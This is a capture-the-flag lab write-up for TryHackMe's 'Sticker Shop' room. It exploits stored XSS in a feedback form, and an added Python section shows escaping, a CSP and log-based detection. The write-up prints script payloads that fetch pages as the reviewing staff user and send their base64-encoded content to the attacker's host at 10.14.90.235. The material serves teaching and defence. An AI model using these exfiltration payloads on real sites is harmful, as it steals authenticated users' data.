# The Sticker Shop

{% embed url="<https://tryhackme.com/r/room/thestickershop>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and find only two open ports: port `22`, on which SSH is available, and port `8080`, on which a Python Werkzeug server hosts a cat sticker shop.

<figure><img src="/files/nGZQ1rwDfDStuoLcq5eK" alt=""><figcaption></figcaption></figure>

The index page has some stickers to offer. Besides that, we have a Feedback page.

<figure><img src="/files/rYQ2zE8TOLe7ddDbkDmM" alt=""><figcaption></figcaption></figure>

On the feedback page, we can leave some feedback, which is reviewed by the staff shortly afterwards. This sounds like `XSS` might be our entry point.

<figure><img src="/files/EnneAuJqMMz4egMfhObu" alt=""><figcaption></figcaption></figure>

## Exploit XSS

The challenge tasks us with retrieving the flag at `http://10.10.49.166:8080/flag.txt` using client-side exploitation.

Furthermore, it states that `they decided to develop and host everything on the same computer`.

> Your local sticker shop has finally developed its own webpage. They do not have too much experience regarding web development, so they decided to develop and host everything on the same computer that they use for browsing the internet and looking at customer feedback. Smart move!
>
> Can you read the flag at `http://10.10.49.166:8080/flag.txt`?

Currently we are not allowed to access `http://10.10.49.166:8080/flag.txt`.

<figure><img src="/files/xlmNOHRduyk2Tu2A54C5" alt=""><figcaption></figcaption></figure>

We get back to the feedback page and prepare some XSS payloads.

<figure><img src="/files/Q3DPTyzNweJR4SZXOQgP" alt=""><figcaption></figcaption></figure>

First, we want to test for simple XSS. If we get a response back to our web server, we have confirmed XSS.

```html
<script src="http://10.14.90.235/feedback"></script>
```

<figure><img src="/files/CAkhLEYTxHfBJlkKRKvR" alt=""><figcaption></figcaption></figure>

We get a response back, so let's craft a payload that makes a request to the page as the reviewing user.

<figure><img src="/files/lZAmVcQoiMFHDkEozB0t" alt=""><figcaption></figcaption></figure>

The next thing to do is to craft a JavaScript payload that exfiltrates the response of a fetch request to the root path (`/`) of the current origin. It sends the text content of the fetched response, Base64-encoded with `btoa`, to our server at `http://10.14.90.235/` in a second fetch request. We use `no-cors` mode so the browser still sends the cross-origin request (the response is opaque, but we do not need to read it), and `credentials: 'same-origin'` so the initial request carries the reviewer's cookies, which lets it capture whatever the authenticated user can see in the target application.

```html
<script>
fetch("/", {method:'GET',mode:'no-cors',credentials:'same-origin'})
  .then(response => response.text())
  .then(text => {
    fetch('http://10.14.90.235/' + btoa(text), {mode:'no-cors'});
  });
</script>
```

We get a base64-encoded response back.

<figure><img src="/files/FLjoKoGlYRKpZanmwLGz" alt=""><figcaption></figcaption></figure>

We successfully got the index page via the user reviewing the feedback.

<figure><img src="/files/r70MQrZQm4o7TRxZePBP" alt=""><figcaption></figcaption></figure>

Now we adapt the payload to include the `flag.txt`.

```html
<script>
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})
  .then(response => response.text())
  .then(text => {
    fetch('http://10.14.90.235/' + btoa(text), {mode:'no-cors'});
  });
</script>
```
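The defender's side of what the payload above relies on, as an added example that is not part of 0xb0b's writeup or the room's own code: the stored feedback reaches the reviewer's browser unescaped, and the stolen text leaves as a `btoa`-encoded request path. The rendering functions, the CSP value and the log line are constructed assumptions; only Python's standard library is used.

```python
import base64
import binascii
import html
import re
from typing import Optional

# Constructed sample feedback: the writeup's stored-XSS payload, as the staff
# member's browser would receive it if the shop echoed feedback verbatim.
FEEDBACK = ('<script>fetch("/flag.txt").then(r => r.text())'
            '.then(t => fetch("http://10.14.90.235/" + btoa(t)))</script>')


def render_feedback_unsafe(feedback: str) -> str:
    """Vulnerable rendering: customer input is placed in the staff page verbatim,
    so a <script> tag becomes a real script element in the reviewer's browser."""
    return f"<li>{feedback}</li>"


def render_feedback_safe(feedback: str) -> str:
    """Hardened rendering: html.escape turns < > & " ' into entities, so the
    same input is displayed as text instead of being parsed as markup."""
    return f"<li>{html.escape(feedback, quote=True)}</li>"


# Second layer for the staff page (assumed config): no 'unsafe-inline', so an
# inline <script> that slipped past escaping does not run, and connect-src
# 'self' stops the fetch() to an external host that the exfiltration needs.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; connect-src 'self'")

# Detection side: btoa(text) becomes the request path, so the exfiltrated
# content is recoverable from a proxy or web-server log. Constructed log line
# with a placeholder body, not the room's flag.
EXFIL_BODY = "FLAG_PLACEHOLDER{constructed}\n"
LOG_LINE = ('10.10.49.166 - - [01/Jan/2024:00:00:00 +0000] "GET /'
            + base64.b64encode(EXFIL_BODY.encode("latin-1")).decode("ascii")
            + ' HTTP/1.1" 404 -')
_PATH_RE = re.compile(r'"GET /([A-Za-z0-9+/=]+) HTTP/')


def decode_exfil_path(log_line: str) -> Optional[str]:
    """Return the decoded path if it is valid base64 of printable ASCII text
    (btoa()-style exfiltration), else None. Heuristic: a normal path such as
    /feedback is also valid base64 but decodes to non-ASCII bytes."""
    m = _PATH_RE.search(log_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    text = raw.decode("latin-1")  # btoa() maps each JS char to one Latin-1 byte
    if not text.isascii() or not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text
```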

After we have submitted our payload, we get a connection back to our web server.

<figure><img src="/files/jXIlgYIq4LIg4fQVF7fc" alt=""><figcaption></figcaption></figure>

And it is the flag.

<figure><img src="/files/C7OULVblw2eeVgeyUW2n" alt=""><figcaption></figcaption></figure>
